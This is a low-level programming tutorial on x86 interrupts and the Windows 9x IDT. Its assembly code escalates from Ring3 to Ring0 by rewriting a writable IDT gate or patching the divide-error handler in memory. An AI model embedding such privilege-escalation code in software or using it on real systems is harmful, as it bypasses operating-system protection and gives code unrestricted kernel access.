Executing Ring0 code under Microsoft Windows 9x
1 - Knowledge Requirements:
- Asm x86
- Basics of the protected mode
2 - Why?
Why? What would anyone do with Ring0 code?
Well, I'd say "everything you can't do with Ring3 code". For instance: accessing privileged registers (the debug registers DR0-7, the control registers CR0-4...), executing privileged instructions, and doing basically anything with memory without any restriction. In other words, there are many reasons; it's up to you to find yours, but be careful not to abuse it. There is often a better way than running Ring0 code. For example, don't switch to Ring0 to write into a process's memory if a regular API call can do it for you.
3 - Exceptions and Interrupts
a - Introduction
To understand the trick we use to switch to Ring0, we first need to understand how exceptions and interrupts work.
For the sake of simplicity, let's treat exceptions and interrupts as the same thing. When an error occurs (divide by 0, write access to a read-only memory area...), an exception is triggered:
- The EFLAGS register is pushed onto the stack
- The CS selector is pushed
- The return address (the offset) is pushed
- Finally, the processor does a far jump to the exception's handler
The return, if there is one, is done with the iretd instruction.
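To make the list concrete, here is a small C model of the stack frame a handler sees for an exception that pushes no error code, such as vector 0 (lowest address first, so the order is the reverse of the pushes). It also covers the case the simplified list leaves out: when the handler is more privileged than the interrupted code, the processor first switches to the handler's stack and pushes the old SS and ESP. The struct and function names are illustrative only; they do not come from any Windows or Intel header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Frame seen by a handler running at the same privilege level as the
 * interrupted code. ESP points at 'eip' when the handler starts. */
struct same_level_frame {
    uint32_t eip;     /* pushed last: return offset                    */
    uint32_t cs;      /* return selector, in the low 16 bits of a dword */
    uint32_t eflags;  /* pushed first                                   */
};

/* Frame seen by a Ring0 handler that interrupted Ring3 code: the processor
 * switched to the Ring0 stack and pushed the caller's SS and ESP first. */
struct inter_level_frame {
    uint32_t eip;
    uint32_t cs;
    uint32_t eflags;
    uint32_t esp;     /* caller's stack pointer  */
    uint32_t ss;      /* caller's stack selector */
};

/* iretd pops EIP, CS and EFLAGS; it also pops ESP and SS only when the new
 * CS has a less privileged RPL than the current CPL (ignoring virtual-8086
 * and nested-task returns). */
static int iretd_pops_ss_esp(uint16_t new_cs, unsigned cpl)
{
    assert(cpl <= 3);
    return (new_cs & 3u) > cpl;
}
```

For example, `iretd_pops_ss_esp(0x0028, 0)` is 0: returning to a selector with RPL 0 while running at CPL 0 leaves SS:ESP alone, a detail the second method in section 4 relies on.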
How does the system know where an exception's handler is? It uses the IDT (Interrupt Descriptor Table). This table contains all the necessary information for the 256 exceptions/interrupts. Vectors 0 to 31 are reserved by Intel for processor exceptions (and the NMI), while vectors 32 to 255 are user-defined and are mostly used for maskable hardware interrupts and software interrupts. Exception and interrupt numbers are called "vectors".
Here is the exception/interrupt list:
| Vector | Description |
|---|---|
| 0 | Divide Error |
| 1 | Debug Exception |
| 2 | NMI (Non-Maskable Interrupt) |
| 3 | Breakpoint |
| 4 | Overflow (INTO) |
| 5 | BOUND Range Exceeded |
| 6 | Invalid Opcode |
| 7 | Device Not Available |
| 8 | Double Fault |
| 9 | Coprocessor Segment Overrun |
| 10 | Invalid Task State Segment |
| 11 | Segment Not Present |
| 12 | Stack Fault |
| 13 | General Protection |
| 14 | Page Fault |
| 15 | Reserved by Intel |
| 16 | Floating-Point Error |
| 17 | Alignment Check |
| 18 | Machine Check |
| 19-31 | Reserved by Intel |
| 32-255 | Maskable Interrupts |
b - IDT
Now let's go back to the IDT. The IDT is an array that maps each vector to a gate descriptor. Each descriptor is 8 bytes long (therefore, to access the n-th descriptor, you just need to add n*8 to the IDT's address).
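As a tiny C sketch of that indexing rule (the function name is illustrative, and 800A8000h is simply the IDT base that SoftIce reports later in this article):

```c
#include <assert.h>
#include <stdint.h>

#define IDT_GATE_SIZE 8u   /* every IDT descriptor is 8 bytes long */

/* Linear address of the descriptor for 'vector' in an IDT based at 'idt_base'. */
static uint32_t idt_gate_address(uint32_t idt_base, unsigned vector)
{
    assert(vector < 256u);  /* the IDT holds at most 256 gates */
    return idt_base + vector * IDT_GATE_SIZE;
}
```

With that base, the page fault gate (vector 14) sits 70h bytes past the start of the table.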
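So... How do we get the IDT's address? If you look at the instruction list, you'll see two instructions related to the IDT: SIDT (Store IDT Register) and LIDT (Load IDT Register). SIDT is not a privileged instruction, so it can be executed from Ring3, whereas LIDT can only be executed at CPL 0.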
Both instructions take a 6-byte memory operand, laid out as follows:
| Bits 47-16 | Bits 15-0 |
|---|---|
| IDT Base Address | IDT Limit |
The last valid byte of the table is at IDT Base Address + IDT Limit, but what interests us here is the IDT Base Address.
So, to get the IDTR register's content, we'll execute the following:
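```asm
; In the code:
sidt fword ptr IDT_Limit     ; store the 6-byte IDTR starting at IDT_Limit

; And in the data:
IDT_Limit       DW 0         ; bytes 0-1: IDT limit
IDT_BaseAddress DD 0         ; bytes 2-5: IDT base address (must directly follow IDT_Limit)
```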
After this code, the variable IDT_BaseAddress holds the IDT's address.
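Once SIDT has filled the 6-byte buffer, the two fields can be pulled apart as in the C sketch below. It decodes the bytes explicitly as little-endian (the x86 byte order) and uses the values SoftIce reports later in this article (base 800A8000h, limit 02FFh) purely as sample input; the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Contents of the 6-byte SIDT/LIDT operand. */
struct idtr {
    uint16_t limit;  /* bytes 0-1 (bits 15-0)  */
    uint32_t base;   /* bytes 2-5 (bits 47-16) */
};

/* Decode the buffer written by SIDT; both fields are little-endian. */
static struct idtr decode_idtr(const uint8_t raw[6])
{
    struct idtr r;
    assert(raw != NULL);
    r.limit = (uint16_t)(raw[0] | (raw[1] << 8));
    r.base  = (uint32_t)raw[2]
            | ((uint32_t)raw[3] << 8)
            | ((uint32_t)raw[4] << 16)
            | ((uint32_t)raw[5] << 24);
    return r;
}

/* Number of complete 8-byte gates covered by the limit (the IDT never
 * uses more than 256). */
static unsigned idt_gate_count(struct idtr r)
{
    unsigned n = ((unsigned)r.limit + 1u) / 8u;
    return n > 256u ? 256u : n;
}
```

With these sample bytes (FF 02 00 80 0A 80), the table holds 96 gates (300h / 8) and its last valid byte is at 800A82FFh.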
c - IDT Descriptors
Now that we know how to get the IDT address, let's take a look at the structure of its descriptors.
There are three kinds of descriptors: task gates, interrupt gates and trap gates. As said earlier, each of them is 8 bytes long. Here are their structures:
Task Gate:

| Dword | Bits 31-16 | Bit 15 | Bits 14-13 | Bits 12-8 | Bits 7-0 |
|---|---|---|---|---|---|
| +4 | Reserved | P | DPL | 00101 | Reserved |
| +0 | TSS Segment Selector | Reserved (bits 15-0) | | | |

Interrupt Gate:

| Dword | Bits 31-16 | Bit 15 | Bits 14-13 | Bits 12-8 | Bits 7-5 | Bits 4-0 |
|---|---|---|---|---|---|---|
| +4 | Offset 31..16 | P | DPL | 01110 | 000 | Reserved |
| +0 | Segment Selector | Offset 15..0 (bits 15-0) | | | | |

Trap Gate:

| Dword | Bits 31-16 | Bit 15 | Bits 14-13 | Bits 12-8 | Bits 7-5 | Bits 4-0 |
|---|---|---|---|---|---|---|
| +4 | Offset 31..16 | P | DPL | 01111 | 000 | Reserved |
| +0 | Segment Selector | Offset 15..0 (bits 15-0) | | | | |
DPL: Descriptor Privilege Level
OFFSET: Offset To Procedure Entry Point
P: Segment Present Bit
RESERVED: Do not use
SELECTOR: Segment Selector For Destination Code Segment
Here, we are going to focus on the interrupt gate (by the way, note that the trap gate has exactly the same structure except for one bit of the type field: 01111 instead of 01110). You can see that the handler's offset is split in two parts: bits 16-31 are stored in the upper 16 bits of the second dword of the descriptor (at +4), whereas bits 0-15 are stored in the lower 16 bits of the first dword (at +0).
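The C sketch below decodes a gate given as its two dwords and reassembles the split offset as just described. The sample input is the vector 0 entry from the SoftIce listing further on (0028:C0001350, DPL=0, present, 32-bit interrupt gate), encoded by hand as lo = 00281350h and hi = C0008E00h; all names are illustrative.

```c
#include <assert.h>
#include <stdint.h>

enum gate_kind { GATE_TASK, GATE_INTERRUPT32, GATE_TRAP32, GATE_OTHER };

struct gate_info {
    uint32_t offset;     /* handler entry point (meaningless for task gates)      */
    uint16_t selector;   /* code segment selector, or TSS selector for task gates */
    unsigned present;    /* P bit                                                 */
    unsigned dpl;        /* descriptor privilege level, 0..3                      */
    enum gate_kind kind; /* from the type field, bits 12-8 of the dword at +4     */
};

static enum gate_kind classify_type(unsigned type)
{
    assert(type <= 0x1Fu);              /* the type field is 5 bits wide */
    switch (type) {
    case 0x05: return GATE_TASK;        /* 00101 */
    case 0x0E: return GATE_INTERRUPT32; /* 01110 */
    case 0x0F: return GATE_TRAP32;      /* 01111 */
    default:   return GATE_OTHER;
    }
}

/* 'lo' is the dword at +0, 'hi' the dword at +4 of the descriptor. */
static struct gate_info decode_gate(uint32_t lo, uint32_t hi)
{
    struct gate_info g;
    g.selector = (uint16_t)(lo >> 16);
    g.offset   = (hi & 0xFFFF0000u) | (lo & 0x0000FFFFu); /* join the two halves */
    g.present  = (hi >> 15) & 1u;
    g.dpl      = (hi >> 13) & 3u;
    g.kind     = classify_type((hi >> 8) & 0x1Fu);
    return g;
}
```

The same function also handles the task gate of vector 8 (selector 0068, type 00101) and the DPL=3 gates such as vector 1.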
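Therefore, if eax holds the IDT base address and ebx the vector number, the following code loads the handler's offset into esi:

```asm
shl  ebx, 3                  ; index*8, since each descriptor is 8 bytes
add  eax, ebx                ; compute the descriptor's address
mov  esi, dword ptr [eax+4]  ; upper dword: offset bits 31..16 land in the top half of esi
mov  si, word ptr [eax]      ; overwrite the low half with offset bits 15..0
```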
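The same logic can be sketched in C. Here the IDT is an ordinary byte buffer holding two hand-encoded gates (the vector 0 and vector 1 entries from the SoftIce listing later in the article), since a C program cannot simply read the real table. The sketch shows why the two-step load works: the first mov brings in the whole upper dword, whose low 16 bits are the P/DPL/type bits, and the second mov overwrites exactly those bits with the low half of the offset. Function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static uint16_t read_le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* C rendering of the four instructions above: 'idt' plays the role of the
 * memory at the IDT base (eax) and 'vector' the role of ebx. */
static uint32_t handler_offset(const uint8_t *idt, size_t idt_size, unsigned vector)
{
    size_t pos = (size_t)vector << 3;           /* shl ebx,3 / add eax,ebx */
    assert(pos + 8 <= idt_size);

    uint32_t esi = read_le32(idt + pos + 4);    /* mov esi,[eax+4] */
    uint16_t si  = read_le16(idt + pos);        /* mov si,[eax]    */
    esi = (esi & 0xFFFF0000u) | si;             /* writing si replaces only the low 16 bits */
    return esi;
}
```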
4 - Switching to Ring0
OK... So... All these details are really nice, but... why do we care? Some say patience is a virtue... Bear with me, we're almost there.
a - Analysis of Microsoft Windows 9x's IDT
To analyze the IDT of Microsoft Windows 9x, I'm going to use NuMega's famous debugger, SoftIce/W. It's the best low-level debugger you'll find for Microsoft Windows 9x and NT, and one of the most important tools you can get to reverse engineer pretty much anything. (NB: Unfortunately, SoftIce has recently been discontinued by Compuware, its new owner. It's really sad to see a historical tool disappear like that. R.I.P.)
Under SoftIce, if you execute the command "idt", you should get something like this:
```
IDTBase=800A8000  Limit=02FF
Int  Type    Sel:Offset     Attributes  Symbol/Owner
000  IntG32  0028:C0001350  DPL=0 P     VMM(01)+0350
001  IntG32  0028:C0001360  DPL=3 P     VMM(01)+0360
002  IntG32  0028:C00046E0  DPL=3 P     Simulate_IO+02A0
003  IntG32  0028:C0001370  DPL=3 P     VMM(01)+0370
004  IntG32  0028:C0001380  DPL=3 P     VMM(01)+0380
005  IntG32  0028:C0001390  DPL=3 P     VMM(01)+0390
006  IntG32  0028:C00013A0  DPL=0 P     VMM(01)+03A0
007  IntG32  0028:C00013B0  DPL=0 P     VMM(01)+03B0
008  TaskG   0068:00000000  DPL=0 P
009  IntG32  0028:C00013C0  DPL=0 P     VMM(01)+03C0
...
```
This command gives us very valuable information. First, you can see the IDT's address: 800A8000. Let's ask SoftIce for information about this memory address using the command "page 800A8000" (the command "query" can give you more information as well).
```
Linear    Physical  Attributes  Type
800A8000  0092D000  P D A U RW  Private
```
What's interesting here is the "attributes" field. Can you see the "RW"?
Welcome to the world of Microsoft Windows 9x... This table is readable and writable! This means anyone can access and modify it. One may wonder why Intel bothered to make LIDT a privileged instruction to stop people from playing with the IDT... We'll see later why being able to write to this table is useful.
Let's continue our journey by focusing on vector 0. We can see that this vector is an interrupt gate (its structure was described earlier in this article), and we can see the address of the code executed when this interrupt is triggered. We use the page command again with this address, "page C0001350", and we get:
```
Linear    Physical  Attributes  Type
C0001350  00110350  P D A U RW  Private
```
It gets better by the minute... Wonderful land... The code itself is writable too: anyone could modify it in place.
To finish this analysis, let's ask for information about the selector using the command "GDT 0028". The GDT command displays the Global Descriptor Table, i.e. the table holding the segment descriptors (and their properties) that selectors refer to.
```
Sel.  Type    Base      Limit     DPL  Attributes
0028  Code32  00000000  FFFFFFFF  0    P RE
```
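What's very important here is the DPL of the segment this selector refers to: 0. It basically means that whenever interrupt 0 (divide by zero) is triggered, its handler runs with code privilege level 0 (CPL 0). Note that the DPL=0 shown for the gate itself in the IDT listing does not get in our way: the processor only checks a gate's DPL for explicit INT n, INT 3 and INTO instructions, not when it raises an exception such as a division by zero.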
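A selector such as 0028 is not an address but an index into a descriptor table. The C sketch below splits a selector into its three fields (index, table indicator, RPL); 0028 gives entry 5 of the GDT with RPL 0, and the privilege the handler runs at comes from the DPL of that GDT entry, which is what the GDT command displays. The names are illustrative, and 002Bh in the checks is just an arbitrary RPL 3 value.

```c
#include <assert.h>
#include <stdint.h>

struct selector_info {
    unsigned index;  /* descriptor number in the GDT or LDT */
    unsigned ti;     /* table indicator: 0 = GDT, 1 = LDT   */
    unsigned rpl;    /* requested privilege level, 0..3     */
};

static struct selector_info decode_selector(uint16_t sel)
{
    struct selector_info s;
    s.index = sel >> 3;
    s.ti    = (sel >> 2) & 1u;
    s.rpl   = sel & 3u;
    return s;
}

/* Byte offset of the descriptor inside its table (8 bytes per entry). */
static uint32_t descriptor_offset(uint16_t sel)
{
    return (uint32_t)(sel & 0xFFF8u);
}
```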
To summarize, under Microsoft Windows 9x:
- the IDT is located in writable memory,
- the code of interrupt 0 (divide by zero) is itself in writable memory,
- and finally, the handler's selector refers to a DPL 0 code segment, so the handler runs at CPL 0.
b - Switching to Ring0 - first method
Now that we have all the information we need, we can design a first method to switch to CPL 0.
The idea of this first approach is the following: since the IDT is writable, nothing prevents us from changing the address stored in one of the vectors to redirect it to our own function. While doing so, modify only the offset, not the selector: the selector is what gives the executed code CPL 0, so you really want to keep it unchanged. I won't give a full example, since it should be simple enough to implement, but remember to restore the original offset once your code has been executed. One more note: as with any interrupt handler, your function must leave every register it uses unchanged when it gives control back to the caller, and it must return with the "iretd" instruction instead of the normal "ret" instruction.
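The bookkeeping this method involves can be sketched in C on an ordinary 8-byte buffer standing in for one gate: only bytes 0-1 and 6-7 (the two halves of the offset) are rewritten, bytes 2-5 (selector, P, DPL, type) are left alone, and the old offset is returned so it can be put back afterwards. The function name and the handler address 00401000h used in the checks are hypothetical, and the sketch does not touch a real IDT.

```c
#include <assert.h>
#include <stdint.h>

/* Replace the handler offset of an interrupt/trap gate, keeping the selector
 * and attribute bytes intact. Returns the previous offset.
 * On a real IDT the two halves are not written atomically; this sketch
 * ignores that. */
static uint32_t set_gate_offset(uint8_t gate[8], uint32_t new_offset)
{
    assert(gate != 0);
    uint32_t old = (uint32_t)gate[0] | ((uint32_t)gate[1] << 8)
                 | ((uint32_t)gate[6] << 16) | ((uint32_t)gate[7] << 24);

    gate[0] = (uint8_t)(new_offset);        /* offset bits 7..0   */
    gate[1] = (uint8_t)(new_offset >> 8);   /* offset bits 15..8  */
    gate[6] = (uint8_t)(new_offset >> 16);  /* offset bits 23..16 */
    gate[7] = (uint8_t)(new_offset >> 24);  /* offset bits 31..24 */
    return old;
}
```

Calling it a second time with the returned value restores the original gate, which is the "switch back the offset" step.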
c - Switching to Ring0 - second method
Here is a second method to switch to Ring0. Oh, by the way, I didn't invent either of these methods, and I don't know who came up with them first. I prefer this one, for a reason I'll explain later.
In this method, instead of changing the interrupt entry point, we'll modify the handler's code directly in memory (you do remember that the code itself was writable, don't you?). To make the explanation easier, let's start with the code itself:
```asm
        sidt  fword ptr IDT
        mov   eax, dword ptr [IDT+2]      ; get the IDT's base address
        mov   esi, dword ptr [eax+4]
        mov   si, word ptr [eax]          ; get the handler offset of vector 0 (divide error)
        mov   eax, dword ptr [esi]        ; get the first 4 bytes of code
        mov   Save1, eax                  ; and save them
        mov   eax, dword ptr [esi+4]      ; the next 4 bytes
        mov   Save2, eax                  ; and save them as well
        mov   CurrentSelector, cs         ; save the current (Ring3) selector
        mov   IntAddress, esi             ; save the handler's address
        mov   dword ptr [esi], 530E5858h  ; pop eax / pop eax / push cs / push ebx
        mov   byte ptr [esi+4], 0CFh      ; iretd
        lea   ebx, Ring0Code              ; ebx = address to execute at CPL 0
        xor   eax, eax
        div   eax                         ; divide by zero! interrupt 0 is triggered here

Ring0Code:
        ; Here we are at CPL 0
        ;...

        mov   esi, IntAddress             ; esi should not have changed... but just in case
        mov   dword ptr [esi], 53515858h  ; pop eax / pop eax / push ecx / push ebx
        mov   byte ptr [esi+4], 0CFh      ; iretd
        xor   ecx, ecx
        mov   cx, CurrentSelector         ; ecx = the old Ring3 selector
        lea   ebx, Ring3Back              ; load the return address
        xor   eax, eax
        div   eax                         ; divide by zero!

Ring3Back:
        ; and we're back at CPL 3
        mov   esi, IntAddress
        mov   eax, Save1                  ; restore the first 4 bytes of the int 0 handler
        mov   dword ptr [esi], eax
        mov   eax, Save2                  ; and the next 4
        mov   dword ptr [esi+4], eax
        ;...
        ; That's it!

; In the data (declarations implied by the code above):
IDT             DF 0    ; 6-byte SIDT buffer: limit (2 bytes) + base (4 bytes)
Save1           DD 0
Save2           DD 0
CurrentSelector DW 0
IntAddress      DD 0
```
Now for the explanation. It is in fact quite simple. We get the IDT's address, use it to get the address of the first interrupt handler (divide by zero), and then back up the first 8 bytes of that handler's code (we are only going to modify the first 5 of them, but it's easier to save 8 bytes). The whole trick lies in these 5 magic bytes: 58 58 0E 53 CF (the DWORD 530E5858h appears reversed in memory because x86 stores values in little-endian order). The corresponding code is:
```asm
pop  eax     ; 58h: pop the return offset
pop  eax     ; 58h: pop the return selector
push cs      ; 0Eh: push the current (CPL 0) selector
push ebx     ; 53h: push ebx as the new return offset
iretd        ; CFh: return
```
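To check the byte order, the C sketch below replays the two stores (`mov dword ptr [esi], 530E5858h` then `mov byte ptr [esi+4], 0CFh`) on an ordinary 8-byte buffer and compares the result with the expected opcodes (58h pop eax, 0Eh push cs, 51h push ecx, 53h push ebx, CFh iretd). It also replays the Save1/Save2 backup and restore. The real handler bytes are unknown here, so the buffer starts with placeholder values, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Store a 32-bit value the way "mov dword ptr [esi], imm32" does on x86:
 * least significant byte first (little-endian). */
static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;
    p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);
    p[3] = (uint8_t)(v >> 24);
}

/* Overwrite the first 5 bytes of the handler with a stub:
 * 4 bytes from 'first_dword' followed by CFh (iretd). */
static void write_stub(uint8_t code[8], uint32_t first_dword)
{
    assert(code != NULL);
    store_le32(code, first_dword);
    code[4] = 0xCF;
}

/* Equivalent of saving or restoring Save1 and Save2: copy all 8 bytes. */
static void copy_code(uint8_t dst[8], const uint8_t src[8])
{
    memcpy(dst, src, 8);
}
```

Bytes 5 to 7 are never touched by the stub; they are saved only because copying two full DWORDs is simpler.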
The idea is to replace the real return address on the stack with the address held in ebx (remember that ebx was initialized before executing the division by zero). Changing only the offset would not do the trick, so we also replace the return selector with the handler's own selector. The stack now holds a new address and, more importantly, a selector that grants CPL 0. The iretd instruction therefore loads CS with this CPL 0 selector, which gives our code the same privilege. Since the new CS is at the same privilege level as the handler, iretd does not restore any stack pointer: our code keeps running on the Ring0 stack, on which the Ring3 SS and ESP saved by the processor when it entered the handler are still sitting.
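The swap can be replayed on a toy model of the Ring0 stack, written in C. It is a simplified model, not an emulator: only the five dwords the processor pushes when the division by zero is taken at CPL 3 are represented. The Ring3 selectors (0137h for CS, 013Fh for SS), the addresses and the EFLAGS value are hypothetical sample values; only 0028 comes from the SoftIce output. After the stub and iretd, execution continues at ebx with CS = 0028, and the Ring3 ESP and SS are still on the stack.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 16

/* Toy downward-growing stack of dwords; top == STACK_WORDS means empty. */
struct toy_stack {
    uint32_t w[STACK_WORDS];
    int top;
};

/* The registers this model cares about. */
struct cpu {
    uint32_t eip, eflags, esp;
    uint16_t cs, ss;
};

static void push(struct toy_stack *s, uint32_t v)
{
    assert(s->top > 0);
    s->w[--s->top] = v;
}

static uint32_t pop(struct toy_stack *s)
{
    assert(s->top < STACK_WORDS);
    return s->w[s->top++];
}

/* First stub: pop eax / pop eax / push cs / push ebx (then iretd). */
static void stub_to_ring0(struct toy_stack *s, uint16_t handler_cs, uint32_t ebx)
{
    (void)pop(s);          /* discard the return offset        */
    (void)pop(s);          /* discard the Ring3 selector        */
    push(s, handler_cs);   /* push cs: 0028, a DPL 0 segment    */
    push(s, ebx);          /* push ebx: the Ring0Code address   */
}

/* iretd executed at 'cpl': ESP and SS are popped only when returning to a
 * less privileged level (RPL of the new CS greater than the current CPL). */
static void iretd(struct toy_stack *s, struct cpu *c, unsigned cpl)
{
    c->eip    = pop(s);
    c->cs     = (uint16_t)pop(s);
    c->eflags = pop(s);
    if ((c->cs & 3u) > cpl) {
        c->esp = pop(s);
        c->ss  = (uint16_t)pop(s);
    }
}
```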
You can now do whatever you want! You can try to read the DR7 register for example (mov eax, DR7).
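Going back to CPL 3 works pretty much the same way. This time the stub pushes the old (CPL 3) selector saved in ecx instead of cs. Because that selector is less privileged, the final iretd also pops the Ring3 ESP and SS that the processor saved during the first division by zero, which puts the original stack back. Here is the modified stub: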
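```asm
pop  eax     ; 58h: pop the return offset
pop  eax     ; 58h: pop the return selector
push ecx     ; 51h: push the saved CPL 3 selector
push ebx     ; 53h: push the return offset (Ring3Back)
iretd        ; CFh: return
```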
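A toy C model of the Ring0 stack shows the return trip. It is a simplified sketch with hypothetical selector and address values (only 0028 comes from SoftIce). The stack starts with the Ring3 ESP and SS left over from the first trip; the second division by zero happens at CPL 0, so the processor pushes only EFLAGS, CS and EIP. After the stub, iretd sees a selector with RPL 3 and also pops ESP and SS, leaving the stack empty. This only works if the Ring0 code leaves the stack exactly as it found it.

```c
#include <assert.h>
#include <stdint.h>

#define STACK_WORDS 16

/* Toy downward-growing stack of dwords; top == STACK_WORDS means empty. */
struct toy_stack {
    uint32_t w[STACK_WORDS];
    int top;
};

struct cpu {
    uint32_t eip, eflags, esp;
    uint16_t cs, ss;
};

static void push(struct toy_stack *s, uint32_t v)
{
    assert(s->top > 0);
    s->w[--s->top] = v;
}

static uint32_t pop(struct toy_stack *s)
{
    assert(s->top < STACK_WORDS);
    return s->w[s->top++];
}

/* Second stub: pop eax / pop eax / push ecx / push ebx (then iretd). */
static void stub_to_ring3(struct toy_stack *s, uint32_t ecx, uint32_t ebx)
{
    (void)pop(s);   /* discard the return offset            */
    (void)pop(s);   /* discard the return selector (0028)   */
    push(s, ecx);   /* saved Ring3 selector                  */
    push(s, ebx);   /* Ring3Back                             */
}

/* iretd executed at 'cpl': ESP and SS are popped only when returning to a
 * less privileged level. */
static void iretd(struct toy_stack *s, struct cpu *c, unsigned cpl)
{
    c->eip    = pop(s);
    c->cs     = (uint16_t)pop(s);
    c->eflags = pop(s);
    if ((c->cs & 3u) > cpl) {
        c->esp = pop(s);
        c->ss  = (uint16_t)pop(s);
    }
}
```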
Finally, we restore the original code of the int 0 handler.
So why do I prefer this method? Simply because the code reads more linearly and is easier to follow: there is no separate function dealing with Ring0. It's also easier to turn it into a macro.
5 - Conclusion
That's it! I hope you have learnt something. If some parts are too fuzzy or you have found errors, don't hesitate to write a comment.
6 - References
- Pentium® Processor Family Developer's Manual, Volume 3: Architecture and Programming Manual (developers' insight CD-ROM). This manual can now be found under the title IA-32 Intel® Architecture Software Developer's Manual, Volume 3: System Programming Guide.